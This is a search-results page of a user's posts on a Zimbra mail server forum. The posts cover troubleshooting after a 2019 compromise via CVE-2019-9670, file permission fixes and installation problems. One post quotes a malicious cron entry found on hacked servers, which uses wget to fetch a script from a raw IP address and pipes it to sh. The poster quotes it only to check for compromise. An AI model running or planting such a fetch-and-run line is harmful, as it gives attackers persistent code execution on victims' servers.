Search found 23 matches

by AR84
Sat Jun 08, 2019 1:18 pm
Forum: Administrators
Topic: How to double check newest patch is installed on 8.8.12 (Ubuntu)
Replies: 1
Views: 442

How to double check newest patch is installed on 8.8.12 (Ubuntu)

Hi, since we had to move our server to a new one (we go attacked by the security issue CVE-2019-9670), I now want to make sure that the latest patch is installed. We are running Ubuntu 16.04 with Zimbra 8.8.12_GA_3803.FOSS According to the instructions we did apt-get update and upgrade in order to h...
by AR84
Tue May 28, 2019 2:34 am
Forum: Administrators
Topic: Zimbra AJAX Webmail not loading
Replies: 126
Views: 42057

Re: Zimbra AJAX Webmail not loading

In our case we dont have this cron * * * * * wget -q -O - http://93.113.108.146:443/cr.sh | sh > /dev/null 2>&1 we only see */15 * * * * sh /opt/zimbra/log/zmswatch.sh; This one we have removed and also done all other steps. Could the script for instaling this again be located somewhere else?
by AR84
Tue May 28, 2019 1:06 am
Forum: Administrators
Topic: Zimbra AJAX Webmail not loading
Replies: 126
Views: 42057

Re: Zimbra AJAX Webmail not loading

I have the same, i kill the service "zmswatch" and make sure it is not in the cron. But 1 day later it is back and running and also the cron is back.
Any idea for a solution?
Patch is installed already
by AR84
Mon May 27, 2019 11:33 am
Forum: Administrators
Topic: Zimbra AJAX Webmail not loading
Replies: 126
Views: 42057

Re: Zimbra AJAX Webmail not loading

Hey guys, dont forget to also check your Email Accounts, in our case there was some users with Administrator privilidge that have been added.
They added the accounts such as
no-replayz@....
no-rreplay@....
zmbr@....

Make sure you delete all accounts that are not from you.
by AR84
Mon May 27, 2019 8:44 am
Forum: Administrators
Topic: Urgently need help, blank screen only on web frontend (not admin panel)
Replies: 6
Views: 677

Re: Urgently need help, blank screen only on web frontend (not admin panel)

One thing that does not work is uploading attachments, could you help me locate the folder where we need to check the permissions?
by AR84
Mon May 27, 2019 8:27 am
Forum: Administrators
Topic: Urgently need help, blank screen only on web frontend (not admin panel)
Replies: 6
Views: 677

Re: Urgently need help, blank screen only on web frontend (not admin panel)

Yes, I understand, I actually followed the instructions and checked about the valnurabilities you mentioned. Also patches have been applied and other security massurements are beeing done. Worst case would be that we move to a new server installation, but as for now we will monitor the server
by AR84
Mon May 27, 2019 7:43 am
Forum: Administrators
Topic: Urgently need help, blank screen only on web frontend (not admin panel)
Replies: 6
Views: 677

Re: Urgently need help, blank screen only on web frontend (not admin panel)

Can be marked as solved, the folder / files rights have changed This article helped: http://forums.zimbra.org/viewtopic.php?f=15&t=66213 Solution: I did the following (as root); cd /opt/zimbra/mailboxd find webapps -type d -exec chmod 0755 {} \; find webapps -type f -exec chmod 0644 {} \; Then r...
by AR84
Mon May 27, 2019 7:07 am
Forum: Administrators
Topic: Urgently need help, blank screen only on web frontend (not admin panel)
Replies: 6
Views: 677

Urgently need help, blank screen only on web frontend (not admin panel)

Hi guys, hope someone can help me. Our current installed version is 8.7.11_GA_1854.FOSS Without any changes, the web interface stopped working. Actually the login page is showing, once I log in, then there comes only a blank page. The Admin panel is working totaly fine, there I can login and I dont ...
by AR84
Sun Nov 26, 2017 8:05 am
Forum: Installation and Upgrade
Topic: [Solved] Zimbra installation Bug On centos 7
Replies: 21
Views: 14627

Re: [Solved] Zimbra installation Bug On centos 7

I am having the same problem, how did you guys solve it??? I followed each step that syslint mentioned, I am also using Hetzner. It is the same issue during installation, no matter if using CentOS 6 or 7... As soon as i comment out the SCOPE then the server is not reachable anymore after a restart.....
by AR84
Sat Nov 25, 2017 1:03 pm
Forum: Administrators
Topic: Postfix went down
Replies: 7
Views: 2122

Re: Postfix went down

As for the tool, yeah, this is free. But then on the other server you will need the backup tool which actually isnt free. I still dont think that the problem on the current server can be so difficult. I just need some hints from someone who knows what he is doing. I dont get it that this kind of pro...

Go to advanced search